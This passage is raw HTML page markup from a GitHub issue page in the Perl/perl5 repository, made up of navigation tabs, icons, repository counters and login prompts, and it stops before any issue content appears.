data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div> </div> </template> </div> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled data-project-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--page-header-bgColor, var(--color-page-header-bg));" data-turbo-replace> <div class="d-flex flex-nowrap flex-justify-end mb-3 px-3 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path> </svg> <span class="author flex-self-stretch" itemprop="author"> <a class="url fn" rel="author" data-hovercard-type="organization" data-hovercard-url="/orgs/Perl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/Perl"> Perl </a> </span> <span class="mx-1 flex-self-stretch color-fg-muted">/</span> <strong itemprop="name" class="mr-2 flex-self-stretch"> <a data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" href="/Perl/perl5">perl5</a> </strong> <span></span><span class="Label Label--secondary v-align-middle mr-1">Public</span> </div> </div> <div id="repository-details-container" class="flex-shrink-0" data-turbo-replace style="max-width: 70%;"> <ul class="pagehead-actions flex-shrink-0 d-none d-md-inline" style="padding: 2px 0;"> <li> <a href="/login?return_to=%2FPerl%2Fperl5" rel="nofollow" id="repository-details-watch-button" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"notification subscription menu watch","repository_id":null,"auth_type":"LOG_IN","originating_url":"https://github.com/Perl/perl5/issues/16649","user_id":null}}" data-hydro-click-hmac="24a831d84dbcb88b6a0e68f472d242e9ceabda18027c4435561aa334d7da79ff" aria-label="You must be signed in to change notification settings" data-view-component="true" class="btn-sm btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path> </svg>Notifications </a> <tool-tip id="tooltip-6baef4b7-0c80-46cb-9949-bc1089c0d467" for="repository-details-watch-button" popover="manual" data-direction="s" data-type="description" data-view-component="true" class="sr-only position-absolute">You must be signed in to change notification settings</tool-tip> </li> <li> <a icon="repo-forked" id="fork-button" href="/login?return_to=%2FPerl%2Fperl5" rel="nofollow" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"repo details fork button","repository_id":8183570,"auth_type":"LOG_IN","originating_url":"https://github.com/Perl/perl5/issues/16649","user_id":null}}" data-hydro-click-hmac="f4d2e9c1b7094e88ff5c91028d730416b73c1ff3d0d15f3a07558ead000ffa78" data-view-component="true" class="btn-sm btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path> </svg>Fork <span id="repo-network-counter" data-pjax-replace="true" data-turbo-replace="true" title="571" data-view-component="true" class="Counter">571</span> </a> </li> <li> <div data-view-component="true" class="BtnGroup d-flex"> <a href="/login?return_to=%2FPerl%2Fperl5" rel="nofollow" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"star button","repository_id":8183570,"auth_type":"LOG_IN","originating_url":"https://github.com/Perl/perl5/issues/16649","user_id":null}}" data-hydro-click-hmac="c81170a2616faa37eecb197f4735090e2d483902ec67da616097bb1f9603e072" aria-label="You must be signed in to star a repository" data-view-component="true" class="tooltipped tooltipped-sw btn-sm btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path> </svg><span data-view-component="true" class="d-inline"> Star </span> <span id="repo-stars-counter-star" aria-label="2063 users starred this repository" data-singular-suffix="user starred this repository" data-plural-suffix="users starred this repository" data-turbo-replace="true" title="2,063" data-view-component="true" class="Counter js-social-count">2.1k</span> </a></div> </li> </ul> </div> </div> <div id="responsive-meta-container" data-turbo-replace> </div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <ul data-view-component="true" class="UnderlineNav-body list-style-none"> <li data-view-component="true" class="d-inline-flex"> <a id="code-tab" href="/Perl/perl5" data-tab-item="i0code-tab" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches repo_packages repo_deployments repo_attestations /Perl/perl5" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g c" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Code","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path> </svg> <span data-content="Code">Code</span> <span id="code-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="issues-tab" href="/Perl/perl5/issues" data-tab-item="i1issues-tab" data-selected-links="repo_issues repo_labels repo_milestones /Perl/perl5/issues" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g i" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Issues","target":"UNDERLINE_NAV.TAB"}" aria-current="page" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item selected"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path> </svg> <span data-content="Issues">Issues</span> <span id="issues-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="2,227" data-view-component="true" class="Counter">2.2k</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="pull-requests-tab" href="/Perl/perl5/pulls" data-tab-item="i2pull-requests-tab" data-selected-links="repo_pulls checks /Perl/perl5/pulls" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g p" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Pull requests","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path> </svg> <span data-content="Pull requests">Pull requests</span> <span id="pull-requests-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="111" data-view-component="true" class="Counter">111</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="actions-tab" href="/Perl/perl5/actions" data-tab-item="i3actions-tab" data-selected-links="repo_actions /Perl/perl5/actions" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g a" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Actions","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path> </svg> <span data-content="Actions">Actions</span> <span id="actions-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="projects-tab" href="/Perl/perl5/projects" data-tab-item="i4projects-tab" data-selected-links="repo_projects new_repo_project repo_project /Perl/perl5/projects" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g b" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Projects","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path> </svg> <span data-content="Projects">Projects</span> <span id="projects-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="wiki-tab" href="/Perl/perl5/wiki" data-tab-item="i5wiki-tab" data-selected-links="repo_wiki /Perl/perl5/wiki" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g w" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Wiki","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path> </svg> <span data-content="Wiki">Wiki</span> <span id="wiki-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="security-tab" href="/Perl/perl5/security" data-tab-item="i6security-tab" data-selected-links="security overview alerts policy token_scanning code_scanning /Perl/perl5/security" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g s" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Security","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> <span data-content="Security">Security</span> <include-fragment src="/Perl/perl5/security/overall-count" accept="text/fragment+html"></include-fragment> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="insights-tab" href="/Perl/perl5/pulse" data-tab-item="i7insights-tab" data-selected-links="repo_graphs repo_contributors dependency_graph dependabot_updates pulse people community /Perl/perl5/pulse" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Insights","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path> </svg> <span data-content="Insights">Insights</span> <span id="insights-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="Not available" data-view-component="true" class="Counter"></span> </a></li> </ul> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <action-menu data-select-variant="none" data-view-component="true"> <focus-group direction="vertical" mnemonics retain> <button id="action-menu-8e1ed7a1-84ad-4539-b9e3-790f19915672-button" popovertarget="action-menu-8e1ed7a1-84ad-4539-b9e3-790f19915672-overlay" aria-controls="action-menu-8e1ed7a1-84ad-4539-b9e3-790f19915672-list" aria-haspopup="true" aria-labelledby="tooltip-796063ef-d170-4806-8426-685e27397ff6" type="button" data-view-component="true" class="Button Button--iconOnly Button--secondary Button--medium UnderlineNav-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal Button-visual"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path> </svg> </button><tool-tip id="tooltip-796063ef-d170-4806-8426-685e27397ff6" for="action-menu-8e1ed7a1-84ad-4539-b9e3-790f19915672-button" popover="manual" data-direction="s" data-type="label" data-view-component="true" class="sr-only position-absolute">Additional navigation options</tool-tip> <anchored-position data-target="action-menu.overlay" id="action-menu-8e1ed7a1-84ad-4539-b9e3-790f19915672-overlay" anchor="action-menu-8e1ed7a1-84ad-4539-b9e3-790f19915672-button" align="start" side="outside-bottom" anchor-offset="normal" popover="auto" data-view-component="true"> <div data-view-component="true" class="Overlay Overlay--size-auto"> <div data-view-component="true" class="Overlay-body Overlay-body--paddingNone"> <action-list> <div data-view-component="true"> <ul aria-labelledby="action-menu-8e1ed7a1-84ad-4539-b9e3-790f19915672-button" id="action-menu-8e1ed7a1-84ad-4539-b9e3-790f19915672-list" role="menu" data-view-component="true" class="ActionListWrap--inset ActionListWrap"> <li hidden="hidden" data-menu-item="i0code-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-56e9f57f-fe0a-44eb-b104-acda962d671e" href="/Perl/perl5" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Code </span> </a> </li> <li hidden="hidden" data-menu-item="i1issues-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-37118aa4-0db7-4cb4-bcab-92768115ca86" href="/Perl/perl5/issues" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Issues </span> </a> </li> <li hidden="hidden" data-menu-item="i2pull-requests-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-ac8cb8ca-b6b3-4ac0-b399-1f6af67c70ad" href="/Perl/perl5/pulls" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Pull requests </span> </a> </li> <li hidden="hidden" data-menu-item="i3actions-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-a8ec60b6-f6db-4c7e-9350-bfdc780b19e2" href="/Perl/perl5/actions" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Actions </span> </a> </li> <li hidden="hidden" data-menu-item="i4projects-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-af102462-88bf-4e57-b8d7-1deef69349f7" href="/Perl/perl5/projects" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Projects </span> </a> </li> <li hidden="hidden" data-menu-item="i5wiki-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-7917aeb5-664d-410b-9537-05db17b2a549" href="/Perl/perl5/wiki" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Wiki </span> </a> </li> <li hidden="hidden" data-menu-item="i6security-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-71323a00-7959-4bc8-bf56-b457b0298e8d" href="/Perl/perl5/security" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Security </span> </a> </li> <li hidden="hidden" data-menu-item="i7insights-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-26dc068a-3972-446e-aef0-9c763e9ffce1" href="/Perl/perl5/pulse" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Insights </span> </a> </li> </ul> </div></action-list> </div> </div></anchored-position> </focus-group> </action-menu></div> </nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <react-app app-name="issues-react" initial-path="/Perl/perl5/issues/16649" style="display: block; min-height: calc(100vh - 64px);" data-attempted-ssr="true" data-ssr="true" data-lazy="false" data-alternate="false" data-data-router-enabled="false" > <script 